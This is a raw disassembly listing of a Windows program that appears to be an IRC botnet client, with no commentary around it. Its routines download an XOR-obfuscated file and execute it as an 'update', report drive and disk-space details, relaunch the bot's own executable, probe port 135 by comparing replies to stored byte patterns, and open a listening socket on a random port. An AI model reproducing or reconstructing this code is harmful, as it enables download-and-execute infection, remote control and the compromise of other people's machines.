call ds:dword_41B06C ; ExitThread
loc_4035E7: ; CODE XREF: sub_403520+68�j
xor edi, edi
call ds:dword_41B078 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
loc_403601: ; CODE XREF: sub_403520+1B4�j
push 200h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+Dst]
push 200h
push eax
push [ebp+var_18]
call dword_42EADC ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_403645
push [ebp+arg_0]
lea eax, [ebp+Dst]
push eax
call sub_403A12
pop ecx
pop ecx
loc_403645: ; CODE XREF: sub_403520+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+Dst]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_41B054 ; WriteFile
cmp edi, ebx
jnb short loc_403683
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_40366D
mov eax, [ebp+arg_0]
loc_40366D: ; CODE XREF: sub_403520+148�j
push eax ; Size
lea eax, [ebp+Dst]
push eax ; Src
mov eax, [ebp+Memory]
add eax, edi
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_403683: ; CODE XREF: sub_403520+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_403690
cmp edi, [ebp+var_3C]
ja short loc_4036DA
loc_403690: ; CODE XREF: sub_403520+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_4036AA
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_4036BA
; ---------------------------------------------------------------------------
loc_4036AA: ; CODE XREF: sub_403520+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_4036BA: ; CODE XREF: sub_403520+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_430340
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_403601
loc_4036DA: ; CODE XREF: sub_403520+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40372F
cmp edi, [ebp+var_3C]
jz short loc_40372F
push [ebp+var_3C]
lea eax, [ebp+Dst]
mov [ebp+var_14], esi
push edi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
lea eax, [ebp+Dst]
push eax
call sub_402D63
add esp, 28h
loc_40372F: ; CODE XREF: sub_403520+1C4�j
; sub_403520+1C9�j
call ds:dword_41B078 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_41B050 ; CloseHandle
push [ebp+Memory] ; Memory
call _free
cmp [ebp+var_38], esi
pop ecx
jz short loc_4037B9
lea eax, [ebp+Filename]
push eax ; Filename
call sub_403067
cmp eax, [ebp+var_38]
pop ecx
jz short loc_4037B9
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+Dst]
push offset aDownloadCrcFai ; "[DOWNLOAD]: CRC Failed (%d != %d)."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
lea eax, [ebp+Dst]
push eax
call sub_402D63
add esp, 28h
loc_4037B9: ; CODE XREF: sub_403520+241�j
; sub_403520+253�j
cmp [ebp+var_14], esi
jz loc_4039F9
cmp [ebp+var_44], 1
jz loc_4038B4
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_41B5E8
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_41B5E8
fstp [esp+590h+var_590]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_403834
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
add esp, 14h
loc_403834: ; CODE XREF: sub_403520+2F2�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
cmp [ebp+var_40], 1
pop ecx
jnz loc_4039F9
push 5
push esi
lea eax, [ebp+Filename]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_42EB34
cmp [ebp+var_30], esi
jnz loc_4039F9
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset aDownloadOpened ; "[DOWNLOAD]: Opened: %s."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
lea eax, [ebp+Dst]
push eax
call sub_402D63
add esp, 24h
jmp loc_4039F9
; ---------------------------------------------------------------------------
loc_4038B4: ; CODE XREF: sub_403520+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_41B5E8
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_41B5E8
fstp [esp+590h+var_590]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40391C
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
add esp, 14h
loc_40391C: ; CODE XREF: sub_403520+3DA�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
push 10h ; Size
lea eax, [ebp+var_10]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_310]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_428D64
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+Filename]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_41B094 ; CreateProcessA
cmp eax, edi
jnz short loc_40399E
call dword_42EB20 ; WSACleanup
call sub_40724A
push esi
call ds:dword_41B090 ; ExitProcess
loc_40399E: ; CODE XREF: sub_403520+46A�j
lea eax, [ebp+Filename]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_4039B8
; ---------------------------------------------------------------------------
loc_4039AC: ; CODE XREF: sub_403520+45�j
lea eax, [ebp+var_248]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_4039B8: ; CODE XREF: sub_403520+48A�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4039EC
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
add esp, 14h
loc_4039EC: ; CODE XREF: sub_403520+4AA�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
pop ecx
loc_4039F9: ; CODE XREF: sub_403520+29C�j
; sub_403520+325�j ...
push [ebp+var_18]
call dword_42EBE4 ; InternetCloseHandle
push [ebp+var_48]
call sub_411F56
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
sub_403520 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403A12 proc near ; CODE XREF: sub_403520+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_403A2E
loc_403A1E: ; CODE XREF: sub_403A12+1A�j
mov dl, byte_424A60
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_403A1E
locret_403A2E: ; CODE XREF: sub_403A12+A�j
retn
sub_403A12 endp
; =============== S U B R O U T I N E =======================================
sub_403A2F proc near ; CODE XREF: sub_409557+22C0�p
; sub_409557+241F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_412EA4
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_403A2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A49 proc near ; CODE XREF: sub_403B59+66�p
; sub_403B59+97�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h ; Size
mov edi, offset dword_42E624
push 0 ; Val
push edi ; Dst
call _memset
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_403A6E: ; CODE XREF: sub_403A49+5B�j
; sub_403A49+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call __aullrem
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call __aulldiv
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_403AAC
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_403A6E
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_403A6E
; ---------------------------------------------------------------------------
loc_403AAC: ; CODE XREF: sub_403A49+4B�j
dec esi
mov eax, edi
loc_403AAF: ; CODE XREF: sub_403A49+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_403ABE
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_403AAF
; ---------------------------------------------------------------------------
loc_403ABE: ; CODE XREF: sub_403A49+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_403A49 endp
; =============== S U B R O U T I N E =======================================
sub_403AC8 proc near ; CODE XREF: sub_403C74+51�p
; sub_403C74+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_42EC10 ; GetDriveTypeA
sub eax, 0
jz short loc_403B0B
dec eax
jz short loc_403B05
dec eax
dec eax
jz short loc_403AFF
dec eax
jz short loc_403AF9
dec eax
jz short loc_403AF3
dec eax
jz short loc_403AED
mov eax, offset word_41F9E4
retn
; ---------------------------------------------------------------------------
loc_403AED: ; CODE XREF: sub_403AC8+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_403AF3: ; CODE XREF: sub_403AC8+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_403AF9: ; CODE XREF: sub_403AC8+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_403AFF: ; CODE XREF: sub_403AC8+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_403B05: ; CODE XREF: sub_403AC8+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_403B0B: ; CODE XREF: sub_403AC8+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_403AC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B11 proc near ; CODE XREF: sub_403B59+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_42EAC0
test eax, eax
jz short loc_403B46
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_403B46: ; CODE XREF: sub_403B11+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_403B11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B59 proc near ; CODE XREF: sub_403C74+17�p
; sub_410E85+1F3�p
Dest = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_403B11
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_403C31
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_403C31
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_403C31
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call __alldiv
push edx
push eax
call sub_403A49
mov edi, offset aSkb ; "%sKB"
push eax
mov esi, 80h
push edi ; Format
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call __alldiv
push edx
push eax
call sub_403A49
push eax
push edi ; Format
lea eax, [ebp+var_118]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call __alldiv
push edx
push eax
call sub_403A49
push eax
push edi ; Format
lea eax, [ebp+var_98]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
pop ebx
jmp short loc_403C60
; ---------------------------------------------------------------------------
loc_403C31: ; CODE XREF: sub_403B59+2C�j
; sub_403B59+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+Dest]
push esi ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+var_118]
push esi ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+var_98]
push esi ; Format
push eax ; Dest
call _sprintf
add esp, 18h
loc_403C60: ; CODE XREF: sub_403B59+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+Dest]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_403B59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403C74(int,char *Str,int,int)
sub_403C74 proc near ; CODE XREF: sub_403D46+17�p
; sub_403D46+60�p
Dest = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
Str1 = byte ptr -80h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_403B59
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+Str1]
push offset aFailed ; "failed"
rep movsd
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
jnz short loc_403CE7
push ebx
push ebx
call sub_403AC8
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_403D1B
; ---------------------------------------------------------------------------
loc_403CE7: ; CODE XREF: sub_403C74+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+Str1]
push eax
push ebx
push ebx
call sub_403AC8
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 20h
loc_403D1B: ; CODE XREF: sub_403C74+71�j
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_403C74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403D46(int,char *Str,int,int)
sub_403D46 proc near ; CODE XREF: sub_409557+4A88�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_403D67
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_403C74
add esp, 10h
jmp short loc_403DC8
; ---------------------------------------------------------------------------
loc_403D67: ; CODE XREF: sub_403D46+9�j
push esi
push edi
push ebx
push ebx
call dword_42EB30 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi ; Size
call _malloc
pop ecx
mov edi, eax
push edi
push esi
call dword_42EB30 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_403DBF
loc_403D8B: ; CODE XREF: sub_403D46+77�j
push offset aA ; "A:\\"
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_403DAE
push esi ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_403C74
add esp, 10h
loc_403DAE: ; CODE XREF: sub_403D46+54�j
push esi ; Str
call _strlen
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_403D8B
loc_403DBF: ; CODE XREF: sub_403D46+43�j
push edi ; Memory
call _free
pop ecx
pop edi
pop esi
loc_403DC8: ; CODE XREF: sub_403D46+1F�j
pop ebx
pop ebp
retn
sub_403D46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DCB proc near ; DATA XREF: WinMain(x,x,x,x)+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
Dst = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43054C
call dword_42EC48 ; closesocket
call sub_411E03
call dword_42EB20 ; WSACleanup
call dword_42EB20 ; WSACleanup
mov ebx, ds:dword_41B048
push 64h
call ebx ; Sleep
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_54]
pop esi
push esi ; Size
push edi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_428D64
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_41B098 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:dword_41B068 ; GetModuleFileNameA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_41B094 ; CreateProcessA
test eax, eax
jz short loc_403E90
push 64h
call ebx ; Sleep
push [ebp+Dst]
mov esi, ds:dword_41B050
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_403E90: ; CODE XREF: sub_403DCB+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_42E65C
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_41B090 ; ExitProcess
pop edi
pop esi
pop ebx
sub_403DCB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403EB3(int,int,void *Buf2,size_t Size)
sub_403EB3 proc near ; CODE XREF: sub_403EEB+125�p
; sub_403EEB+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Buf2 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+Size]
test edi, edi
jle short loc_403EE1
loc_403EC4: ; CODE XREF: sub_403EB3+2C�j
push [ebp+Size] ; Size
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+Buf2] ; Buf2
push eax ; Buf1
call _memcmp
add esp, 0Ch
test eax, eax
jz short loc_403EE7
inc esi
cmp esi, edi
jl short loc_403EC4
loc_403EE1: ; CODE XREF: sub_403EB3+F�j
xor al, al
loc_403EE3: ; CODE XREF: sub_403EB3+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_403EE7: ; CODE XREF: sub_403EB3+27�j
mov al, 1
jmp short loc_403EE3
sub_403EB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EEB proc near ; CODE XREF: sub_4013EE+8B�p
; sub_4013EE+174�p ...
var_2010 = dword ptr -2010h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call __alloca_probe
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_403F2C
dec eax
jz short loc_403F0A
dec eax
loc_403F04: ; CODE XREF: sub_403EEB+57�j
xor eax, eax
loc_403F06: ; CODE XREF: sub_403EEB+3F�j
; sub_403EEB+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_403F0A: ; CODE XREF: sub_403EEB+16�j
push 3
push 1388h
push [ebp+arg_0]
call dword_42EBF0 ; inet_addr
push eax
call sub_40275B
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_403F06
; ---------------------------------------------------------------------------
loc_403F2C: ; CODE XREF: sub_403EEB+13�j
push 6
push 1
push 2
call dword_42EC30 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_403F04
push ebx
xor ebx, ebx
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 87h
call dword_42EBB4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4082EB
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_42EB60 ; connect
cmp eax, edi
jz loc_404048
push ebx
push 48h
push offset dword_41FA70
push esi
call dword_42EC00 ; send
cmp eax, edi
jz loc_404048
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_42EBCC ; recv
cmp eax, edi
jz loc_404048
cmp byte ptr [ebp+var_2010+2], 0Ch
jnz short loc_404048
push ebx
push 18h
push offset dword_41FABC
push [ebp+arg_4]
call dword_42EC00 ; send
cmp eax, edi
jz short loc_404048
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_42EBCC ; recv
mov esi, eax
cmp esi, edi
jz short loc_404048
cmp byte ptr [ebp+var_2010+2], 2
jnz short loc_404048
push 10h ; Size
push offset dword_41FAD8 ; Buf2
lea eax, [ebp+var_2010]
push esi ; int
push eax ; int
call sub_403EB3
add esp, 10h
test al, al
jz short loc_404028
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_404048
; ---------------------------------------------------------------------------
loc_404028: ; CODE XREF: sub_403EEB+12F�j
push 10h ; Size
push offset dword_41FAEC ; Buf2
lea eax, [ebp+var_2010]
push esi ; int
push eax ; int
call sub_403EB3
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_404048: ; CODE XREF: sub_403EEB+9B�j
; sub_403EEB+B2�j ...
push [ebp+arg_4]
call dword_42EC48 ; closesocket
mov eax, ebx
pop ebx
jmp loc_403F06
sub_403EEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404059 proc near ; DATA XREF: sub_4022E3+226�o
var_A6C = byte ptr -0A6Ch
var_8DC = dword ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
Dst = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
Str = byte ptr -124h
Dest = byte ptr -0F8h
var_C4 = byte ptr -0C4h
Str1 = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
call ds:dword_41B1AC ; WSAStartup
push edi ; Time
call _time
push eax
call sub_41274C
pop ecx
pop ecx
call _rand
cdq
mov ecx, 0FC17h
push edi
idiv ecx
push ebx
push 2
add edx, 3E8h
mov dword_42E668, edx
call ds:dword_41B1B0 ; socket
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call ds:dword_41B1B4 ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
call ds:dword_41B1B8 ; ioctlsocket
mov ax, word ptr dword_42E668
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call ds:dword_41B1BC ; htons
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call ds:dword_41B1C0 ; bind
test eax, eax
jge short loc_404132
mov eax, ebx
jmp loc_404653
; ---------------------------------------------------------------------------
loc_404132: ; CODE XREF: sub_404059+D0�j
push 0Ah
push esi
call ds:dword_41B1C4 ; listen
mov [ebp+var_228], ebx
mov ebx, ds:dword_41B1C8
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_404150: ; CODE XREF: sub_404059+130�j
; sub_404059+5F2�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor esi, esi
lea eax, [ebp+var_438]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_41B1CC ; select
cmp eax, 0FFFFFFFFh
jz loc_404650
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_404150
loc_40418B: ; CODE XREF: sub_404059+5EC�j
xor esi, esi
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 64h ; Size
lea eax, [ebp+Str1]
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_41AFC0 ; __WSAFDIsSet
test eax, eax
jz loc_40463E
cmp edi, [ebp+var_C]
jnz short loc_404242
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_C]
call ds:dword_41B1D4 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40463E
xor ecx, ecx
cmp [ebp+var_228], esi
jbe short loc_40420C
lea edx, [ebp+var_224]
